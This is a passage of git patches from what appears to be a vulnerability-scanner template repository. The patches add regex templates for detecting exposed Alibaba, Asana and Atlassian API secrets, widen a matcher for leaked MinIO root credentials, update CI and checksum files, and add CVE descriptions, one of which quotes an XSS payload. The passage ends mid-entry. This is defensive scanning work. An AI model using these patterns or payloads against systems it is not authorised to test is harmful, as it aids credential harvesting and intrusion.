a/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml b/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml new file mode 100644 index 0000000000..a60e6e5a68 --- /dev/null +++ b/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml @@ -0,0 +1,24 @@ +id: alibaba-secretkey-id + +info: + name: Alibaba Secret Key ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml + metadata: + max-request: 1 + verified: true + tags: alibaba,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/asana/asana-client-id.yaml b/http/exposures/tokens/asana/asana-client-id.yaml new file mode 100644 index 0000000000..de4dd4f421 --- /dev/null +++ b/http/exposures/tokens/asana/asana-client-id.yaml @@ -0,0 +1,24 @@ +id: asana-client-id + +info: + name: Asana Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml + metadata: + max-request: 1 + verified: true + tags: asana,exposure,tokens,secret + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/asana/asana-client-secret.yaml b/http/exposures/tokens/asana/asana-client-secret.yaml new file mode 100644 index 0000000000..05257645b7 --- /dev/null +++ b/http/exposures/tokens/asana/asana-client-secret.yaml @@ -0,0 +1,24 @@ +id: asana-client-secret + +info: + name: Asana Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml + metadata: + max-request: 1 + verified: true + tags: asana,exposure,tokens,secret + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/atlassian-token.yaml b/http/exposures/tokens/atlassian-token.yaml new file mode 100644 index 0000000000..e6255bf3e6 --- /dev/null +++ b/http/exposures/tokens/atlassian-token.yaml @@ -0,0 +1,24 @@ +id: atlassian-token + +info: + name: Atlassian API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go + metadata: + max-request: 1 + verified: true + tags: atlassian,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file From 8f529c8ca768b8d915417478bbf9d49ae697c684 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 4 Jul 2023 14:46:26 +0530 Subject: [PATCH 345/609] Update CVE-2023-28432.yaml --- http/cves/2023/CVE-2023-28432.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index e4ee6e2a71..07489056e7 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -41,7 +41,8 @@ http: words: - '"MINIO_ROOT_PASSWORD":' - '"MINIO_ROOT_USER":' - condition: and + - '"MinioEnv":' + condition: or - type: word part: header From 50a51cdc2ec12739702216402908bda5cb88a2fc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 09:21:15 +0000 Subject: [PATCH 347/609] Auto Generated Templates Checksum [Tue Jul 4 09:21:15 UTC 2023] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 51dad2472f..293f5b41bc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -436,7 +436,7 @@ http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a00a5b7 http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e http/cves/2000/CVE-2000-0114.yaml:af678de88ba0c25c5c699691cbbca26e655ca74c -http/cves/2001/CVE-2001-0537.yaml:2ec7796ffa1adbb36f0902dcfc702ce1a6c1508c +http/cves/2001/CVE-2001-0537.yaml:1bf2cb96b4bf92aca46e615725f17d6ba7ec185c http/cves/2002/CVE-2002-1131.yaml:ea67e639e7bbc2c8145242b6fdff303688113115 http/cves/2004/CVE-2004-0519.yaml:df333316e5285784c041ca82bba6a73d0fa79a96 http/cves/2004/CVE-2004-1965.yaml:4f029cd743345b0828e644bfe22f5cdb2c6289b7 @@ -2256,7 +2256,7 @@ http/cves/2023/CVE-2023-24243.yaml:f7140f03e945019aeacaecc8b17522e54b76c22b http/cves/2023/CVE-2023-24278.yaml:73df5ba94e0c9c9d4bb93e84e0aff81a08e9e02e http/cves/2023/CVE-2023-24322.yaml:d5974d1b331522108a5c6887310883dc37e2dc84 http/cves/2023/CVE-2023-24367.yaml:bbd47946b2f67527112614488332589093ee79f9 -http/cves/2023/CVE-2023-24488.yaml:34e23a93619e8092f6655376e9d006ee71509c29 +http/cves/2023/CVE-2023-24488.yaml:08b61a72b0709d78722c23863de42b33ec5b9c26 http/cves/2023/CVE-2023-24657.yaml:a74e32282a92bcd670fd99eb1f795ebbeb3cfd1f http/cves/2023/CVE-2023-24733.yaml:371ec9554e1239ff6f5278113e9938f331d238b7 http/cves/2023/CVE-2023-24735.yaml:5531cc3389cc427a38868696e7a22919348cdba9 @@ -6494,7 +6494,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:6e9f0c6d5696079d72dadc2809a531b2b7bcef8f +templates-checksum.txt:393986fa9f05004f7042cceec9ea9ec3c1ba3987 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From f88b868e6dc0407396dd7cdf4a0bfc362899f641 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 4 Jul 2023 15:04:02 +0530 Subject: [PATCH 348/609] misc workflow update --- .github/workflows/cve2json.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 412a6a8dd4..249b72f334 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -5,7 +5,7 @@ on: branches: - main paths: - - 'http/cves/' + - 'http/cves/**' workflow_dispatch: # allows manual triggering of the workflow jobs: From 3b2506ba2124e4b9b0a27228f4d5bd37a2a56ac2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 4 Jul 2023 15:06:41 +0530 Subject: [PATCH 349/609] fixed typo update --- .github/workflows/cve2json.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 249b72f334..0ad846f2db 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -36,7 +36,7 @@ jobs: git commit -m "Auto Generated cves.json [$(date)] :robot:" -a - name: Push changes - if: steps.checksum.outputs.CHANGES > 0 + if: steps.cves.outputs.CHANGES > 0 run: | git pull --rebase git push origin ${{ github.ref }} From c5e9bee4e82b39ec625472f24cfb6b16a5492822 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 09:37:29 +0000 Subject: [PATCH 350/609] Auto Generated cves.json [Tue Jul 4 09:37:29 UTC 2023] :robot: --- cves.json | 32 +++++++++++++++++++++++++++++++- cves.json-checksum.txt | 2 +- 2 files changed, 32 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index c2fb429c44..259a07c22c 100644 --- a/cves.json +++ b/cves.json @@ -1,5 +1,5 @@ {"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"} -{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration Arbitrary Administrative Access","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"} +{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration - Authentication Bypass","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"} {"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"} {"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2004/CVE-2004-0519.yaml"} {"ID":"CVE-2004-1965","Info":{"Name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2004/CVE-2004-1965.yaml"} @@ -194,6 +194,7 @@ {"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"} {"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"} {"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"} +{"ID":"CVE-2012-6499","Info":{"Name":"WordPress Plugin Age Verification v0.4 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-6499.yaml"} {"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"} {"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"} {"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-2251.yaml"} @@ -561,6 +562,7 @@ {"ID":"CVE-2018-6008","Info":{"Name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","Severity":"high","Description":"Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6008.yaml"} {"ID":"CVE-2018-6184","Info":{"Name":"Zeit Next.js \u003c4.2.3 - Local File Inclusion","Severity":"high","Description":"Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6184.yaml"} {"ID":"CVE-2018-6200","Info":{"Name":"vBulletin - Open Redirect","Severity":"medium","Description":"vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-6200.yaml"} +{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"} {"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"} {"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"} {"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"} @@ -1379,6 +1381,7 @@ {"ID":"CVE-2021-46417","Info":{"Name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","Severity":"high","Description":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46417.yaml"} {"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"} {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} +{"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"} {"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} {"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"} {"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"} @@ -1717,6 +1720,7 @@ {"ID":"CVE-2022-3982","Info":{"Name":"WordPress Booking Calendar \u003c3.2.2 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-3982.yaml"} {"ID":"CVE-2022-39952","Info":{"Name":"Fortinet FortiNAC - Arbitrary File Write","Severity":"critical","Description":"Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39952.yaml"} {"ID":"CVE-2022-39960","Info":{"Name":"Jira Netic Group Export \u003c1.0.3 - Missing Authorization","Severity":"medium","Description":"Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-39960.yaml"} +{"ID":"CVE-2022-40022","Info":{"Name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","Severity":"critical","Description":"Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40022.yaml"} {"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2022/CVE-2022-40083.yaml"} {"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40359.yaml"} {"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4050.yaml"} @@ -1776,9 +1780,13 @@ {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} {"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} +{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} +{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} +{"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"} +{"ID":"CVE-2023-0563","Info":{"Name":"Bank Locker Management System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-0563.yaml"} {"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"} {"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other 